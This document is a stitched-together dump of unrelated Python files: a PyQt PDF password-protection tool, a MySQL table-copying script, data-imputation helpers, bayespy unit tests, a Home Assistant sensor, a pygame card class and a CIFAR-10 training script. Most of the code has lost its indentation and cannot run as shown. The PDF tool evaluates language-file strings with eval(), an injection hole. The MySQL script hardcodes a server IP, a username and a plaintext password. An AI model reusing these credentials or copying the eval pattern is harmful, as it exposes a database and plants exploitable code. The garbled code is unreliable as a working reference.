class ProtectPdfWindow(QtWidgets.QWidget):
def __init__(self, lang_file='en.json'):
super().__init__()
if os.path.isfile(lang_file):
self.lang = json.loads(open(lang_file, 'r', encoding='utf8').read())
else:
print(f'Error: File {lang_file} does not exist. Using default language English')
self.lang = default_lang
self.buttonChooseDir = QtWidgets.QPushButton(self.lang['select_dir'])
self.buttonStartEncrypting = QtWidgets.QPushButton(self.lang['add_pwd_protection'])
self.exitButton = QtWidgets.QPushButton(self.lang['quit'])
self.dirText = QtWidgets.QLabel(self.lang['no_dir_selected'])
self.infoText = QtWidgets.QLabel(self.lang['will_be_applied_to_zero'])
self.passwordText = QtWidgets.QLabel(self.lang['pwd'])
self.lineEditPassword = QtWidgets.QLineEdit(self)
self.checkBoxDecrypt = QtWidgets.QCheckBox(self.lang['remove_pwd_protection_checkbox'])
self.layout = QtWidgets.QVBoxLayout(self)
self.hbox1 = QtWidgets.QHBoxLayout()
self.hbox2 = QtWidgets.QHBoxLayout()
self.hbox3 = QtWidgets.QHBoxLayout()
self.layout.addLayout(self.hbox1)
self.hbox1.addWidget(self.buttonChooseDir)
self.hbox1.addWidget(self.dirText)
self.layout.addLayout(self.hbox2)
self.hbox2.addWidget(self.passwordText)
self.hbox2.addWidget(self.lineEditPassword)
self.layout.addLayout(self.hbox3)
self.hbox3.addWidget(self.checkBoxDecrypt)
self.hbox3.addWidget(self.buttonStartEncrypting)
self.layout.addWidget(self.infoText)
self.layout.addWidget(self.exitButton)
self.infoText.setWordWrap(True)
self.buttonChooseDir.clicked.connect(self.pickDirectory)
self.buttonStartEncrypting.clicked.connect(self.protectPdfs)
self.checkBoxDecrypt.stateChanged.connect(lambda: self.buttonStartEncrypting.setText(self.lang['remove_pwd_protection'] if self.checkBoxDecrypt.isChecked() else self.lang['add_pwd_protection']))
self.exitButton.clicked.connect(self.close)
self.directory = ''
self.pdfs = []
@QtCore.Slot()
def pickDirectory(self):
self.directory = str(QtWidgets.QFileDialog.getExistingDirectory(self, self.lang['select_dir']))
self.infoText.setText(self.lang['dirs_are_being_searched'])
self.infoText.repaint()
self.dirText.setText(self.directory)
self.pdfs = list(map(str, Path(self.directory).rglob('*.pdf')))
self.infoText.setText(self.eval_lang_string(self.lang['pdfs_were_found'], locals()))
@QtCore.Slot()
def protectPdfs(self):
password = self.lineEditPassword.text()
if not password:
print(self.lang['no_pwd_provided'])
self.infoText.setText(self.lang['no_pwd_provided'])
return
self.infoText.setText('')
infoText = ''
cnt = 0
for pdf_path in self.pdfs:
try:
if self.checkBoxDecrypt.isChecked():
pdf = Pdf.open(pdf_path, password=password)
pdf.save(pdf_path + '.tmp')
else:
pdf = Pdf.open(pdf_path)
pdf.save(pdf_path + '.tmp', encryption=Encryption(owner=password, user=password, R=4))
pdf.close()
os.remove(pdf_path)
os.rename(pdf_path + '.tmp', pdf_path)
modification = self.eval_lang_string(self.lang['pdfs_were_modified'], locals())
print(modification)
infoText += modification + '\n'
cnt += 1
except Exception as e:
error = self.eval_lang_string(self.lang['error_on_pdf_processing'], locals())
print(error)
print(e)
infoText += error + '\n'
infoText += self.eval_lang_string(self.lang['done'], locals())
self.infoText.setText(infoText)
def eval_lang_string(self, s, env=globals() | locals()):
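        # Language entries are f-string templates evaluated against the caller's
        # locals; note that eval() means the language file must be trusted input.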
return eval("f'" + s + "'", env)
default_lang = {
"select_dir":"Select directory",
"quit":"Quit",
"no_dir_selected":"No directory selected",
"will_be_applied_to_zero":"No PDFs will be modified",
"pwd":"Password:",
"add_pwd_protection":"Protect PDFs with password",
"remove_pwd_protection":"Remove passwords from PDFs",
"remove_pwd_protection_checkbox":"Remove password?",
"pdfs_were_found":"{str(len(self.pdfs))} PDFs were found",
"no_pwd_provided":"No password was specified",
"dirs_are_being_searched":"Directories are being searched",
"pdfs_were_modified":"PDF was {\"decrypted\" if self.checkBoxDecrypt.isChecked() else \"encrypted\"} ({pdf_path})",
"done":"Done: {cnt}/{len(self.pdfs)} PDFs were {\"decrypted\" if self.checkBoxDecrypt.isChecked() else \"encrypted\"}",
"error_on_pdf_processing":"An error occured while processing PDF {pdf_path}"
}
if __name__ == '__main__':
app = QtWidgets.QApplication([])
widget = ProtectPdfWindow()
widget.resize(400, 200)
widget.show()
sys.exit(app.exec())
| python |
def remap( x, oMin, oMax, nMin, nMax ):
    """Linearly map x from the range [oMin, oMax] onto [nMin, nMax].

    Either range may be reversed (min > max). Returns the result as an int,
    or None if either range has zero width.
    """
    # range check
    if oMin == oMax:
        print("Warning: Zero input range")
        return None
    if nMin == nMax:
        print("Warning: Zero output range")
        return None
    # check for a reversed input range
    reverseInput = False
    oldMin = min( oMin, oMax )
    oldMax = max( oMin, oMax )
    if oldMin != oMin:
        reverseInput = True
    # check for a reversed output range
    reverseOutput = False
    newMin = min( nMin, nMax )
    newMax = max( nMin, nMax )
    if newMin != nMin:
        reverseOutput = True
portion = (x-oldMin)*(newMax-newMin)/(oldMax-oldMin)
if reverseInput:
portion = (oldMax-x)*(newMax-newMin)/(oldMax-oldMin)
result = portion + newMin
if reverseOutput:
result = newMax - portion
return int(result)
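# Quick demonstration with hypothetical values: map 0-10 onto 0-100,
# then onto the reversed output range 100-0.
if __name__ == "__main__":
    print(remap(2, 0, 10, 0, 100))   # -> 20
    print(remap(2, 0, 10, 100, 0))   # reversed output -> 80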
| python |
import pandas as pd
from sqlalchemy import create_engine
import pymysql.cursors
def connect():
""" Connect to MySQL database """
source = None
try:
source = pymysql.connect(host='35.220.139.166',
user='tonyho',
password='zanik5dbkr',
database='osmosisdatatest',
cursorclass=pymysql.cursors.DictCursor)
if source:
print('Connected to Source MySQL database')
    except pymysql.Error as e:
print(e)
def test():
source = pymysql.connect(host='35.220.139.166',
user='tonyho',
password='zanik5dbkr',
database='osmosisdatatest',
cursorclass=pymysql.cursors.DictCursor)
df = pd.read_sql_query(" SELECT * FROM management_case ", source)
df['time'] =pd.to_timedelta(df['time'])
print(df['time'].head(10))
def read():
try:
source = pymysql.connect(host='35.220.139.166',
user='tonyho',
password='zanik5dbkr',
database='osmosisdatatest',
cursorclass=pymysql.cursors.DictCursor)
creds = {'usr': 'tonyho',
'pwd': 'zanik5dbkr',
'hst': '35.220.139.166',
'prt': 3306,
'dbn': 'osmosisdatatest1'}
connstr = 'mysql+mysqlconnector://{usr}:{pwd}@{hst}:{prt}/{dbn}'
engine = create_engine(connstr.format(**creds))
#df = pd.read_sql_query(" SELECT * FROM auth_user ", source)
#df.to_sql(con=engine, name='auth_user', if_exists='append', index=False)
#print("Auth_user work!")
#df = pd.read_sql_query(" SELECT * FROM authtoken_token ", source)
#df.to_sql(con=engine, name='authtoken_token', if_exists='append', index=False)
#print("authtoken_token!")
#df = pd.read_sql_query(" SELECT * FROM OneToOne_customer ", source)
#df.to_sql(con=engine, name='OneToOne_customer', if_exists='append', index=False)
#print("Customer work!")
#df = pd.read_sql_query(" SELECT * FROM management_product " , source)
#df.to_sql(con=engine, name='management_product', if_exists='append',index=False)
#print("Product work!")
#df = pd.read_sql_query(" SELECT * FROM management_technician ", source)
#df.to_sql(con=engine, name='management_technician', if_exists='append', index=False)
#print("Technician work!")
#df = pd.read_sql_query(" SELECT * FROM management_mainperiod ", source)
#df.to_sql(con=engine, name='management_mainperiod', if_exists='append', index=False)
#print("Main Period work!")
#df = pd.read_sql_query(" SELECT * FROM management_filter ", source)
#df.to_sql(con=engine, name='management_filter', if_exists='append', index=False)
#print("Filter work!")
#df = pd.read_sql_query(" SELECT * FROM management_case ", source , parse_dates=['time'])
#df['time'] = pd.DataFrame({'time': pd.to_timedelta(df['time'])})
#df['time'] = df['time'].astype('str')
#df.replace({'NaT': None}, inplace=True)
#df.to_sql(con=engine, name='management_case1', if_exists='append', index=False)
#print("Case work!")
df = pd.read_sql_query(" SELECT * FROM management_case_filters ", source)
df.to_sql(con=engine, name='management_case_filters1', if_exists='append', index=False)
print("Case Filter work!")
df = pd.read_sql_query(" SELECT * FROM management_case_machines ", source)
df.to_sql(con=engine, name='management_case_machines1', if_exists='append', index=False)
print("Case Machine work!")
df = pd.read_sql_query(" SELECT * FROM management_machine ", source)
df.to_sql(con=engine, name='management_machine1', if_exists='append', index=False)
print("Machine work!")
df = pd.read_sql_query(" SELECT * FROM management_mainpack ", source)
df.to_sql(con=engine, name='management_mainpack', if_exists='append', index=False)
print("Mainpack work!")
except Exception as e:
print(e)
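# For large tables, a chunked transfer keeps memory bounded. A minimal sketch
# (hypothetical helper; reuses the same source connection and engine objects
# as read(), with an arbitrary chunk size):
def copy_table_chunked(source, engine, table, chunksize=5000):
    for chunk in pd.read_sql_query(f"SELECT * FROM {table}", source, chunksize=chunksize):
        chunk.to_sql(con=engine, name=table, if_exists='append', index=False)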
if __name__ == '__main__':
connect()
read()
###test()
| python |
import pandas as pd
import numpy as np
import helper_functions.DataFrames as dfimport
def FillNaNWithCurrentDistribution(column, df):
'''
    Input : The name of the column to which the filling strategy should be applied,
    plus the DataFrame object containing the relevant data.
    Output : The Pandas DataFrame object given as input, where missing values in the
    column have been replaced by values drawn from the current distribution.
'''
data = df
# Current distribution, [dtype: float64]
s = data[column].value_counts(normalize=True)
missing = data[column].isnull()
data.loc[missing, column] = np.random.choice(
s.index, size=len(data[missing]), p=s.values)
#res_ser = pd.Series(data[column])
return data
def FillNaNWithCurrentDistributionFromCsv(column, csv):
'''
    Input : The name of the column to which the filling strategy, for missing values,
    should be applied, plus the name of the csv the data should be obtained from.
    Output : A Pandas Series object containing the column where missing values have
    been replaced by values drawn from the current distribution.
'''
data = pd.DataFrame()
    if csv == 'listings.csv':
        data = dfimport.GetListingsDataFrame()
    elif csv == 'primary_data.csv':
        data = dfimport.GetPrimaryDataFrame()
    elif csv == 'secondary_data.csv':
        data = dfimport.GetSecondaryDataFrame()
    else:
raise Exception('No data set with this name could be found!')
# Current distribution, [dtype: float64]
s = data[column].value_counts(normalize=True)
missing = data[column].isnull()
data.loc[missing, column] = np.random.choice(
s.index, size=len(data[missing]), p=s.values)
res_ser = pd.Series(data[column])
return res_ser
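# A minimal sketch of the distribution-based fill on a toy DataFrame
# (hypothetical data, independent of the csv helpers above):
if __name__ == '__main__':
    toy = pd.DataFrame({'room_type': ['Entire home', 'Private room',
                                      'Private room', None, None]})
    filled = FillNaNWithCurrentDistribution('room_type', toy)
    print(filled['room_type'].value_counts())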
| python |
################################################################################
# Copyright (C) 2013 Jaakko Luttinen
#
# This file is licensed under the MIT License.
################################################################################
"""
Unit tests for bayespy.utils.linalg module.
"""
import numpy as np
from .. import misc
from .. import linalg
class TestDot(misc.TestCase):
def test_dot(self):
"""
Test dot product multiple multi-dimensional arrays.
"""
# If no arrays, return 0
self.assertAllClose(linalg.dot(),
0)
# If only one array, return itself
self.assertAllClose(linalg.dot([[1,2,3],
[4,5,6]]),
[[1,2,3],
[4,5,6]])
# Basic test of two arrays: (2,3) * (3,2)
self.assertAllClose(linalg.dot([[1,2,3],
[4,5,6]],
[[7,8],
[9,1],
[2,3]]),
[[31,19],
[85,55]])
# Basic test of four arrays: (2,3) * (3,2) * (2,1) * (1,2)
self.assertAllClose(linalg.dot([[1,2,3],
[4,5,6]],
[[7,8],
[9,1],
[2,3]],
[[4],
[5]],
[[6,7]]),
[[1314,1533],
[3690,4305]])
# Test broadcasting: (2,2,2) * (2,2,2,2)
self.assertAllClose(linalg.dot([[[1,2],
[3,4]],
[[5,6],
[7,8]]],
[[[[1,2],
[3,4]],
[[5,6],
[7,8]]],
[[[9,1],
[2,3]],
[[4,5],
[6,7]]]]),
[[[[ 7, 10],
[ 15, 22]],
[[ 67, 78],
[ 91, 106]]],
[[[ 13, 7],
[ 35, 15]],
[[ 56, 67],
[ 76, 91]]]])
# Inconsistent shapes: (2,3) * (2,3)
self.assertRaises(ValueError,
linalg.dot,
[[1,2,3],
[4,5,6]],
[[1,2,3],
[4,5,6]])
# Other axes do not broadcast: (2,2,2) * (3,2,2)
self.assertRaises(ValueError,
linalg.dot,
[[[1,2],
[3,4]],
[[5,6],
[7,8]]],
[[[1,2],
[3,4]],
[[5,6],
[7,8]],
[[9,1],
[2,3]]])
# Do not broadcast matrix axes: (2,1) * (3,2)
self.assertRaises(ValueError,
linalg.dot,
[[1],
[2]],
[[1,2,3],
[4,5,6]])
# Do not accept less than 2-D arrays: (2) * (2,2)
self.assertRaises(ValueError,
linalg.dot,
[1,2],
[[1,2,3],
[4,5,6]])
class TestBandedSolve(misc.TestCase):
def test_block_banded_solve(self):
"""
Test the Gaussian elimination algorithm for block-banded matrices.
"""
#
# Create a block-banded matrix
#
# Number of blocks
N = 40
# Random sizes of the blocks
#D = np.random.randint(5, 10, size=N)
# Fixed sizes of the blocks
        D = 5*np.ones(N, dtype=int)
# Some helpful variables to create the covariances
W = [np.random.randn(D[i], 2*D[i])
for i in range(N)]
# The diagonal blocks (covariances)
A = [np.dot(W[i], W[i].T) for i in range(N)]
# The superdiagonal blocks (cross-covariances)
B = [np.dot(W[i][:,-1:], W[i+1][:,:1].T) for i in range(N-1)]
C = misc.block_banded(A, B)
# Create the system to be solved: y=C*x
x_true = np.random.randn(np.sum(D))
y = np.dot(C, x_true)
x_true = np.reshape(x_true, (N, -1))
y = np.reshape(y, (N, -1))
#
# Run tests
#
# The correct inverse
invC = np.linalg.inv(C)
# Inverse from the function that is tested
(invA, invB, x, ldet) = linalg.block_banded_solve(np.asarray(A),
np.asarray(B),
np.asarray(y))
# Check that you get the correct number of blocks
self.assertEqual(len(invA), N)
self.assertEqual(len(invB), N-1)
# Check each block
i0 = 0
for i in range(N-1):
i1 = i0 + D[i]
i2 = i1 + D[i+1]
# Check diagonal block
self.assertTrue(np.allclose(invA[i], invC[i0:i1, i0:i1]))
# Check super-diagonal block
self.assertTrue(np.allclose(invB[i], invC[i0:i1, i1:i2]))
i0 = i1
# Check last block
self.assertTrue(np.allclose(invA[-1], invC[i0:, i0:]))
# Check the solution of the system
self.assertTrue(np.allclose(x_true, x))
# Check the log determinant
self.assertAlmostEqual(ldet/np.linalg.slogdet(C)[1], 1)
| python |
# Taken from https://github.com/ojroques/garbled-circuit
import json
# HELPER FUNCTIONS
def parse_json(json_path):
    """Load and return the JSON document stored at json_path."""
    with open(json_path) as json_file:
return json.load(json_file)
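# Example usage (the path below is hypothetical; any JSON circuit
# description from the upstream repo would do):
if __name__ == "__main__":
    circuit = parse_json("circuits/add.json")
    print(list(circuit.keys()))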
| python |
"""Support the binary sensors of a BloomSky weather station."""
from __future__ import annotations
import voluptuous as vol
from homeassistant.components.binary_sensor import (
PLATFORM_SCHEMA,
BinarySensorDeviceClass,
BinarySensorEntity,
)
from homeassistant.const import CONF_MONITORED_CONDITIONS
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
from . import DOMAIN
SENSOR_TYPES = {"Rain": BinarySensorDeviceClass.MOISTURE, "Night": None}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_MONITORED_CONDITIONS, default=list(SENSOR_TYPES)): vol.All(
cv.ensure_list, [vol.In(SENSOR_TYPES)]
)
}
)
def setup_platform(
hass: HomeAssistant,
config: ConfigType,
add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the available BloomSky weather binary sensors."""
    if discovery_info is not None:
        return
    # Default needed in case of discovery
    sensors = config[CONF_MONITORED_CONDITIONS]
bloomsky = hass.data[DOMAIN]
for device in bloomsky.devices.values():
for variable in sensors:
add_entities([BloomSkySensor(bloomsky, device, variable)], True)
class BloomSkySensor(BinarySensorEntity):
"""Representation of a single binary sensor in a BloomSky device."""
def __init__(self, bs, device, sensor_name): # pylint: disable=invalid-name
"""Initialize a BloomSky binary sensor."""
self._bloomsky = bs
self._device_id = device["DeviceID"]
self._sensor_name = sensor_name
self._attr_name = f"{device['DeviceName']} {sensor_name}"
self._attr_unique_id = f"{self._device_id}-{sensor_name}"
self._attr_device_class = SENSOR_TYPES.get(sensor_name)
def update(self):
"""Request an update from the BloomSky API."""
self._bloomsky.refresh_devices()
self._attr_is_on = self._bloomsky.devices[self._device_id]["Data"][
self._sensor_name
]
| python |
import pygame
from buttons.image_button import ImageButton
class CardComponent:
def __init__(self, screen, x, y, suit, value):
self.flipped = False
self.value = value
self.suit = suit
card_image = f"assets/{value}_{suit}.png"
self.card = ImageButton(screen, x, y, card_image, 0.5)
self.back_card = ImageButton(screen, x, y, "assets/back_red.png", 0.5)
self.hold = False
def draw(self):
        if self.flipped:
self.back_card.draw()
else:
self.card.draw()
def flip(self):
self.flipped = not self.flipped
def getFlipped(self):
return self.flipped
def moveCard(self, x, y):
self.card.move(x, y)
def flipHold(self):
self.hold = not self.hold
def getHold(self):
return self.hold
def collides(self, pos):
        return self.card.collides(pos) or self.back_card.collides(pos)
| python |
import os
import time
import torch
import argparse
import torchvision
import torch.nn as nn
import torch.utils.data
import torch.optim as optim
import torchvision.transforms as transforms
from utils.function import *
from model.SE import SEresnet, loss_fn_kd
from torch.optim import lr_scheduler
from torch.utils.data import DataLoader
from torchvision.datasets import CIFAR10
best_prec1 = 0
def main(args):
global best_prec1
# CIFAR-10 Training & Test Transformation
print('. . . . . . . . . . . . . . . .PREPROCESSING DATA . . . . . . . . . . . . . . . .')
TRAIN_transform = transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
if args.cutout :
TRAIN_transform.transforms.append(Cutout(n_masks = args.n_masks, length = args.length))
VAL_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
# CIFAR-10 dataset
train_dataset = torchvision.datasets.CIFAR10(root = '../data/',
train = True,
transform = TRAIN_transform,
download = True)
val_dataset = torchvision.datasets.CIFAR10(root = '../data/',
train = False,
transform = VAL_transform,
download = True)
# Data loader
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
pin_memory = True,
drop_last = True,
batch_size = args.batch_size ,
shuffle=True)
val_loader = torch.utils.data.DataLoader(dataset=val_dataset,
pin_memory = True,
batch_size = args.batch_size ,
shuffle=False)
# Device Config
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = SEresnet()
model = model.to(device)
criterion = nn.CrossEntropyLoss().to(device)
optimizer = optim.SGD(model.parameters() , lr = args.lr , weight_decay = args.weight_decay, momentum = args.momentum)
lr_schedule = lr_scheduler.MultiStepLR(optimizer, milestones = [250,375], gamma = 0.1)
    if args.evaluate:
        model.load_state_dict(torch.load('./save_model/model.pt'))
        model.to(device)
        validation(args, val_loader, model, criterion)
        return
# Epoch = args.Epoch
for epoch_ in range(0, args.Epoch):
print('current lr {:.5e}'.format(optimizer.param_groups[0]['lr']))
if args.KD == True:
teacher_model = SEresnet().to(device)
teacher_checkpoint = './save_model/teacher_model.pt'
load_checkpoint(teacher_checkpoint, teacher_model)
train_one_epoch_KD(args, train_loader, teacher_model, model, criterion, optimizer, epoch_)
else:
train_one_epoch(args, train_loader, model, criterion, optimizer, epoch_)
lr_schedule.step()
prec1 = validation(args, val_loader, model, criterion)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
if epoch_ > 0 and epoch_ % args.save_every == 0:
save_checkpoint({
'epoch': epoch_ + 1,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=os.path.join(args.save_dir, 'checkpoint.pt'))
save_checkpoint({
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=os.path.join(args.save_dir, 'model.pt'))
# torch.save({
# 'epoch': epoch,
# 'model_state_dict': model.state_dict(),
# 'optimizer_state_dict': optimizer.state_dict(),
# 'loss': loss,
# })
print('THE BEST MODEL prec@1 : {best_prec1:.3f} saved. '.format(best_prec1 = best_prec1))
def train_one_epoch(args, train_loader, model, criterion, optimizer, epoch_):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
model.train()
end = time.time()
for i, (input_, target) in enumerate(train_loader):
input_v = input_.to(device)
target = target.to(device)
target_v = target
output = model(input_v)
loss = criterion(output, target_v)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# output = output.float()
# loss = loss.float()
# measure accuracy and record loss
prec1 = accuracy(output.data, target)[0]
losses.update(loss.item(), input_.size(0))
top1.update(prec1.item(), input_.size(0))
batch_time.update( time.time() - end )
end = time.time()
if i % args.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch_, i,len(train_loader),batch_time=batch_time,loss=losses,top1=top1))
def validation(args, val_loader, model, criterion):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
model.eval()
end = time.time()
with torch.no_grad():
for i, (input_, target) in enumerate(val_loader):
input_v = input_.to(device)
target = target.to(device)
target_v = target
output = model(input_v)
loss = criterion(output, target_v)
# loss = loss.float()
prec1 = accuracy(output.data, target)[0]
losses.update(loss.item(), input_.size(0))
top1.update(prec1.item(), input_.size(0))
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1))
print(' * Prec@1 {top1.avg:.3f}'.format(top1=top1))
return top1.avg
def train_one_epoch_KD(args, train_loader, teacher_model, model, criterion, optimizer, epoch_):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
model.train()
teacher_model.eval()
end = time.time()
for i, (input_, target) in enumerate(train_loader):
input_ = input_.to(device)
target = target.to(device)
output_teacher = teacher_model(input_)
output = model(input_)
# loss = criterion(output, target)
loss = loss_fn_kd(output, target, output_teacher)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure accuracy and record loss
prec1 = accuracy(output.data, target)[0]
losses.update(loss.item(), input_.size(0))
top1.update(prec1.item(), input_.size(0))
batch_time.update( time.time() - end )
end = time.time()
if i % args.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch_, i,len(train_loader),batch_time=batch_time,loss=losses,top1=top1))
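# The script defines main(args) but never invokes it; a minimal entry-point
# sketch follows. The flag names and defaults are assumptions inferred from
# the attributes used above, not the author's original interface.
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='SE-ResNet CIFAR-10 training')
    parser.add_argument('--Epoch', type=int, default=500)
    parser.add_argument('--batch_size', type=int, default=128)
    parser.add_argument('--lr', type=float, default=0.1)
    parser.add_argument('--weight_decay', type=float, default=5e-4)
    parser.add_argument('--momentum', type=float, default=0.9)
    parser.add_argument('--cutout', action='store_true')
    parser.add_argument('--n_masks', type=int, default=1)
    parser.add_argument('--length', type=int, default=16)
    parser.add_argument('--KD', action='store_true')
    parser.add_argument('--evaluate', action='store_true')
    parser.add_argument('--print_freq', type=int, default=50)
    parser.add_argument('--save_every', type=int, default=10)
    parser.add_argument('--save_dir', type=str, default='./save_model')
    main(parser.parse_args())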
| python |